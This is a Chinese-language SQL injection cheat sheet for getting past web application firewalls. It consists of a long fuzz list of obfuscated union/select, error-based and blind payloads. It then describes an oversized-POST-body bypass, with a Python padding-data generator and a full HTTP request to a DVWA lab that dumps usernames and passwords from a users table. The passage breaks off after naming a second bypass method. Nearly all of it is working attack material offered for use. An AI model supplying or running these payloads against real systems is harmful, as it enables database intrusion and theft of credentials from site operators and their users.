如果目标站点支持https尽量用https进行突破。
注入bypass fuzz waf
'
--
' order/*/*/by/**/1--+
' order/**/by 1 --+
!
"
"%20and%20"1"="1
"%20and%20"1"="2
"%20OR%20"1"="1
"%20OR%20"1"="2
#
%
%'%20and%201=1%20and%20'%'='
%'%20and%201=2%20and%20'%'='x
%')%20and%201=1%20and%20('%'='
%')%20and%201=2%20and%20('%'='x
%09union%09select 1,2
%0a
%0A%20
%0aunion%0aselect 1,2
%0b
%0baunion%0bselect 1,2
%0c
%0caunion%0cselect 1,2
%0d
%0d%0aunion%0d%0aselect 1,2
%0daunion%0dselect 1,2
--%0dunion select
%20
'%20and%20'1'='1
'%20and%20'1'='2
'%20OR%20'1'='1
'%20OR%201=1--%20-
'%20OR%20'1'='2
'%20OR%201=2--%20-
%22
%23
%23%0afrom
%23?%0auion%20?%23?%0aselect
%23?%0auion%20?%23?%0aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%23x%0A/*!database*/()
%25%37%35%25%36%45%25%36%39%25%36%46%25%36%45%25%32%30%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34
%250aunion%250aselect 1,2
%252f%252a*/union%252f%252a /select%252f%252a*/
%252f%252a*/union%252f%252a /select%252f%252a*/
%26 1=1
%26 1=2
%26 hex(0)
%26 hex(1)
%27
%2d%2d%0afrom
%2d%2d%0from
%2f**%2funion%2f**%2fselect
%2f**%2funion%2f**%2fselect
%2f**%2funion%2f**%2fselect%2f**%2f
%2f**%2funion%2f**%2fselect%2f**%2f
%53eLEct
%55nion %53eLEct
%55nion %53eLEct
%55nion(%53elect 1,2,3)-- -
%55nion(%53elect 1,2,3)-- -
%55nion(%53elect)
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
%a0
%a0from
%df
%u0066rom
&
&&
&& 1=1
&& 1=2
(
(information_schema.schemata)
(select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)/*!union*/
)
)%20and%20(1=1
')%20and%20('1'='1
)%20and%20(1=2
')%20and%20('1'='2
)%20OR%20(1=1
')%20OR%20('1'='1
)%20OR%20(1=2
')%20OR%20('1'='2
)%20OR%201=1--%20-
')%20OR%201=1--%20-
)%20OR%201=2--%20-
')%20OR%201=2--%20-
*
*/*
*9e0UnIoN
*9e0UnIoN*9e0slect
,
.
/
/%23A%0a/
/%2A%2A/union/%2A%2A/select/%2A%2A/
/&id=1308%20order%20by%2035&b=/
/*
/* */union/* */select/ */1,2;
/*!%23/*%0afrom*/
/*!%53eLEct*/
/*!%55NiOn*/ /*!%53eLEct*/
/*!%55NiOn*/ /*!%53eLEct*/
/*!00000%23/*%0afrom*/
/*!10440union%0aselect*/
/*!11440updatexml*/(1,1,1)
/*!11441extractvalue*/(1, concat(0x5c, (SELECT @@version)))
/*!12345union*//*!12345select*/1,2;
/*!40000union*//*!40000select*/1,2
/*!50000UniON SeLeCt*/
/*!50000UniON SeLeCt*/
/*!50000union*//*!50000select*/1,2
/*!5000updatexml*/(1,1,1)
/*!from*/
/*!select*/
/*!u%6eion*/ /*!se%6cect*/
/*!u%6eion*/ /*!se%6cect*/
/*!uNIOn*/ /*!SelECt*/
/*!uNIOn*/ /*!SelECt*/
/*!union*//*!00000all*//*!00000select*/1,2
/*!union*//*!select*/1,2
/*!union*/+/*!select*/
/*!union*/+/*!select*/
/*!UnIoN*/SeLecT+
/*!UnIoN*/SeLecT+
/**/
/**//*!12345UNION SELECT*//**/
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**//*!union*//**//*!select*//**/
/**//*!union*//**//*!select*//**/
/**/UNION/**//*!50000SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/**/union/**/select/**/
/*--*/union/*--*/select/*--*/
/**/union/**/select/**/
/*--*/union/*--*/select/*--*/
/**_**/UnIoN(/*!50000SeLeCt*/
/*xxx*/()
/*中文*/union/*中文*/select/*中文*/1,2;
//
//*
;
@
@;
\'
\\
\Nfrom
\Nselect
\Nunion
^
`
`information_schema`.`schemata`
`information_schema`.schemata
`updatexml`(1,(select @@version),1)
`users`
|
||
|| 1=0
|| 1=1
'||1=geometryCollection(updatexml(1,concat(0x7e,database(),0x7e),1))--+
~
-~
+
--+
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
+#uNiOn+#sEleCt
+#uNiOn+#sEleCt
--+%0d%0aunion--+%0d%0aselect--+%0d%0a1,--+%0d%0a2
+or+0x3a!=1--+
+or+0x3a=1--+
+un/**/ion+se/**/lect
+un/**/ion+se/**/lect
+uni%0bon+se%0blect+
+uni%0bon+se%0blect+
+UnIOn%0d%0aSeleCt%0d%0a
+UnIOn%0d%0aSeleCt%0d%0a
+union+distinct+select+
+union+distinct+select+
+union+distinctROW+select+
+union+distinctROW+select+
+UNunionION+SEselectLECT+
+UNunionION+SEselectLECT+
<
<>
=
>
1' order--%0aby--%0a1--%0a--+
'1'='1
1efrom
2.0 from
8e0from
ADD
admin'
admin.users
admin+.user
all
alter
anandd
AND
and (select 1)=(Select 0x1)
and (select 1)=(Select 0xA*1000)
and ~1>1
and 1=1
and -1=-1
and 1=2
and -2<-1
and exp(~(select * from(select user())x));--+
and exp(~(select%23%0apassword%23%0afrom(select%23%0auser())x));--+
'and extractvalue/*/676*/(1,concat(0x7e,database/*/387*/(),x07e))--+
and hex()
and hex(1)>~1
and hex(1)>-1
and true=true --+
and!!!!1=1
and!!!!if((substr((select hex(user/**/(/*!*/))),1,1)>1),sleep/**/(/*!5*/),1)
and%201=1
and%201=2
and(select 1)=(Select 0xA*1000)/*!uNIOn*//*!SeLECt*/ 1,user()
and/*@%$^(*/ 1=1
and+0x3a!=info()--
as
ascii
Ascii(1)
ASSIC
atan()
BEFORE
benchmark
benchmark()
bin
BY
case
CAST
CAST()
ceil()
ceiling()
char
CHAR(102, 114, 111, 109)
Char(49)
Char('97')
col_name()
COLUMN
CONCAT
concat()
concat(version(),'|',user());
concat_ws
concat_ws()
concat_ws('|',1,2,3)
convert()
COUNT
CREATE
CURSOR
database
database /*//--/*/ ()
database%23x%0A()
database()
database()||’
database/*!20553()*/
database/*!20553()*/--+
database/**/()
database/*///-*/()
database/*/11111*/()
database/*xxx*/()
database+()
DATABASES
db_name()
delete
drop
e0FrOm
e0union(select!1,)
e0union(select(1),(select user from user limit 1)
e0union(select(1),)
e0union(select/!50000/1,)
e0union(select@'id',)
e0union(select{1},)
e0union(select~1,)
e0union(select+1,)
e0union(select'1',(select user from user limit 1)
e0union(select'1',)
e0union(select-1,)
else
END
exec
exp()
extracavalue()
extractvalue
floor
floor()
for
format
FrOFrOmm
FrOm
from/*!%23/*%0ainformation_schema.tables*/
from/*!--+/*%0ainformation_schema.columns*/
from/*!--+/*%0ainformation_schema.tables*/
from/*!information_schema.tables*/
GeometryCollection
greatest()
GROUP
group by 1
group_concat
handler
HAS_DBACCESS()
having
hex
Hex('a')
hex(user/**/(/**/))
id =1' and 1=1 --+
id =1' and 1=2 --+
id =1' or '1'='1
id=1' || '1'='1
id=-1' like "[%23]" /*!10440union select*/ 1,2,3 --+
id=1' or 1=1#
IF
in
INFILE
INFORMATION
Information_schema./**_**/Tables
information_schema.`schemata`
information_schema.tables
information_schema/**/.schemata
infromation_schema
insert
inset
instr
INTO
into @a,@b,@c,@d;
IS_MEMBER()
IS_SRVROLEMEMBER()
JOIN
LEAVE
left
Left(@@version,1)
Left(version(),1)
Length
LEVEL
like
like "[%23]" /*!10440union select*/
like["%23"]
LIMIT
limit 1 offset 0
Lpad(version(),1,1)
mid
mid()substring()
mid(version() from 1 for 1)
Mid(version(),1,1)
MultiLineString
MultiPoint
NAMES
NEXT
NULL
null+UNION+SELECT+1,2
object_id()
OF
ON
oorr
OR
or 1=0
or 1=1
OR%201=1
OR%201=2
ORD
order
order /*//--/*/ by
order aby
order by
order by 1
order--%0aby
Order%A0By
order/**/by
order/*--*/by
order/*//*/by
order/**/by
OUTFILE
Polygon
prepare
procedure analyse()
rand()
REGEXP
RENAME
REPLACE
REVERSE
REVERSE(noinu)+REVERSE(tceles)
REVERSE(noinu)+REVERSE(tceles)
reverse(right(reverse(version()),1)
right
Right(@@version,1)
RLIKE
Rpad(version(),1,1)
s%u0065lect
s%u006c%u0006ect
s%u00f0lect
SCHEMA
se%0blect
sel%e%ct
sele%ct
sele/**/ct
SeleCt
select * from user where username in('user');
select * from user where username like 'user';
select * from user where username='user';
select union select{x 1},
select(1)from
select{x user}from{x mysql.user};
SEPARATOR
SET
SHOW
sign()
sleep
sleep()
SQL
sqrt()
substr()
Substr(version(),1,1)
substring
Substring(@@version,1,1)
Substring(version(),1,1)
sys schemma
sys.schema_table_statistics_with_buffer
TABLE
TABLE_SCHEMA
tan()
THEN
TRUE
u%6eion s%65lect
u%6eion se%6cect
u%6eion se%6cect
un?+un/**/ion+se/**/lect+
Unhex(61)
uni%0bon+se%0blect
uni%0bon+se%0blect
uni%6fn distinct%52OW s%65lect
uni%u006fn sel%u0065ct
unio%6e %73elect
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
unio%6e%20%64istinc%74%20%73elect
UNioN
union /*!00000%23%0aselect*/
union -- 1%0a select
union -- hex()%0a select
union %23%0aall select
union (/*!/**/ SeleCT */ 1,2,3)
union (/*!/**/ SeleCT */ 1,2,3)
union (select)
union /*!50000%53elect*/
union /*!50000%53elect*/
union /*//--/*/ select
union /*@%$^(*/ select
union /*@%$^(*/ select --+
union all %u0053elect
union all select
union all select 1,2
union all%23%0a select
union distinct
union DISTINCT select
union DISTINCT select 1,2
union distinctrow
UnIoN SeLeCt
union select * from (select 1)a join (select 2)b join(select user())c join(select 4)d******;
union select 1,(select(schema_name)from(information_schema.SCHEMATA)limit 0,1)
union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/limit 0,1)
union select 1,(select(schema_name)from{x information_schema.SCHEMATA}limit 0,1)
uNIoN sELecT 1,2
union select all
union select DISTINCT
union%20%64istinctRO%57%20select
union%20%64istinctRO%57%20select
union%20/*!44509select*/%20
union%2053elect
union%2053elect
union%20all%23%0a%20select%20
union%20distinct%20select
union%20distinct%20select
union%20select%20
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
union%250Cselect
union%25A0select
union%a0%0aselect 1,'2',
union%a0%0aselect 1,'2','3',
union(select%0aall{x users}from{x ddd})
union(select%0adistinct{x users}from{x ddd})
union(select%0adistinctrow{x users}from{x ddd})
union/*!23000select*/
union/*%00*/%23a%0A/*!/*!select
union/*%00*/%23a%0A/*!/*!select%20
union/*%0a%0b%20%a0--*/select
UNION/*&test=1*/SELECT/*&pwn=2*/
UNION/*&test=1*/SELECT/*&pwn=2*/
union/*&username=*/select
union/**/select
union/**/select/**/1,2
union/*/!*!**/select
union/*/!--**/select
UNION/*/%21*%21**/SELECT
union/*/-*!!*/select
union/*//--**/select
union/*//\\\*/select+1,2--+
union/*//--\\\*/select+1,2--+
UNiOn/*/1/*/select
union/aaaa%01bbs/select
union/aaaaaaaaaaaaaaaaaaaaaaa/select
union/aaaaaaaaaaaaaaaaaaaaaaaaaaaa/select
UNiOn--+%02%0d%0aselect
union+/*!select*/
union+/*!select*/
union+distinctROW+select
UNIunionONSeLselectECT
ununionion selselectect
UPDATE
updatexml
updatexml()
user
user()
user/**/()--+
users
USING
VALUE
VALUES
VARCHAR
VERSION
when
WHERE
xor
绕过方式1:超大数据包绕过(mysql)
假如HTTP请求POST BODY太大,检测所有内容,WAF集群消耗太多的CPU、内存资源。因此许多WAF只检测前面的2M或4M的内容。对于攻击者而言,只需要在POST BODY前面添加许多无用的数据,把攻击的payload放在最后即可绕过WAF检测。
绕过技巧:•GET型请求转POST型•Content-Length头长度大于8200•正常参数在脏数据后面,否则无效
zangshuju.py
#coding=utf-8
import random,string
import sys
from urllib import parse
varname_min = 5
varname_max = 15
data_min = 20
data_max = 30
num_min = 1
num_max = int(sys.argv[1])
def randstr(length):
str_list = [random.choice(string.ascii_letters) for i in range(length)]
random_str = ''.join(str_list)
return random_str
def main():
data={}
for i in range(num_min,num_max):
data[randstr(random.randint(varname_min,varname_max))]=randstr(random.randint(data_min,data_max))
print('&'+parse.urlencode(data)+'&')
main()
POST /dvwa/vulnerabilities/sqli/?Submit=Submit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8200
Origin: http://localhost
Connection: close
Referer: http://localhost/dvwa/vulnerabilities/sqli/?Submit=Submit
Cookie: security=low; ECS[visit_times]=1; PHPSESSID=90a4331de18bcd32ee2d780254f44589
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
a=/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCDDDDDBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCSSSSSSSSSSSSSSSSSSSSSSSSSSSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBB&id=1' union select null,concat_ws(char(32,58,32),user,password) from users%23
绕过方式2:函数分隔符绕过(mysql)
规则缺陷/特性:函数与括号之间插入分隔符可以正常执行
